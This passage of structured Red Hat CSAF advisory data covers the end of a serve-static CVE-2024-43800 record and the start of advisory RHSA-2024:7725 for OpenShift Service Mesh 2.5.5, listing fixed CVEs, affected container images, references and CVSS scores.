"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, ], }
rhsa-2024:7725
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.5.5
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* envoy: abnormal termination when using auto_sni with authority header longer
than 255 characters (CVE-2024-32475)
* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.5.5\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* envoy: abnormal termination when using auto_sni with authority header longer\nthan 255 characters (CVE-2024-32475)\n* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7725", url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2259228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259228", }, { category: "external", summary: "2272986", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272986", }, { category: "external", summary: "2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7725.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5", tracking: { current_release_date: "2025-04-10T00:21:12+00:00", generator: { date: "2025-04-10T00:21:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7725", initial_release_date: "2024-10-07T09:24:53+00:00", revision_history: [ { date: "2024-10-07T09:24:53+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:24:53+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.5 for RHEL 8", product: { name: "RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.5::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product_identification_helper: { purl: 